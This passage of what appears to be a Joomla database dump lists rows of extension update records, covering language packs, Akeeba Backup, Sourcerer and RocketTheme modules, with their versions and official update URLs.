DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5249,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5250,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5251,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5252,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5253,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5254,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5255,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5256,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5257,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5258,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5259,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5260,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5261,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5262,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5263,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5264,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5265,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5266,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(5267,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(5268,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(5269,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.6','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-6.html			\n		',''),(5270,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5271,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5272,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(5273,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5274,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5275,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5276,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5277,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(5278,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5279,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5280,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5281,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5282,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(5283,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5284,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5285,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5286,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5287,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5288,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5289,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5290,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5291,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5292,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5293,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5294,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5295,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5296,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5297,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5298,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5299,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5300,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5301,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5302,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5303,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5304,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5305,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5306,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5307,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5308,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5309,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5310,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5311,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5312,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5313,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5314,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5315,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5316,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5317,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5318,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5319,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5320,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5321,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5322,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5323,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5324,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5325,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5326,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5327,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5328,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5329,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5330,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(5331,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(5332,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(5333,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(5334,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(5335,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(5336,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5337,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5338,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5339,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5340,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5341,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5342,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5343,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5344,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5345,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5346,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5347,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5348,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5349,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5350,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5351,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5352,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5353,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5354,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5355,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5356,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5357,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5358,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5359,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5360,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5361,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5362,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5363,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5364,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5365,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5366,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5367,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5368,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5369,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5370,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5371,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5372,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5373,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5374,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5375,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5376,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5377,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5378,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5379,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5380,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5381,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3078',''),(5382,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(5383,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(5384,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(5385,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5386,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5387,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5388,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5389,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5390,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5391,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5392,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5393,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5394,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5395,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5396,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5397,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5398,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5399,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5400,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5401,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5402,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5403,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5404,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5405,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5406,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5407,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5408,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5409,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5410,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5411,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5412,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5413,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5414,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5415,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5416,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5417,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5418,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5419,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5420,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5421,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5422,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5423,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5424,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5425,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5426,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5427,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5428,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5429,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5430,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5431,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5432,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5433,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5434,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5435,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(5436,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(5437,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(5438,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(5439,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(5440,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(5441,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5442,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5443,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5444,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5445,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5446,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5447,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5448,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5449,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5450,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5451,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5452,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5453,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5454,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5455,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5456,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5457,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5458,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5459,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5460,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5461,5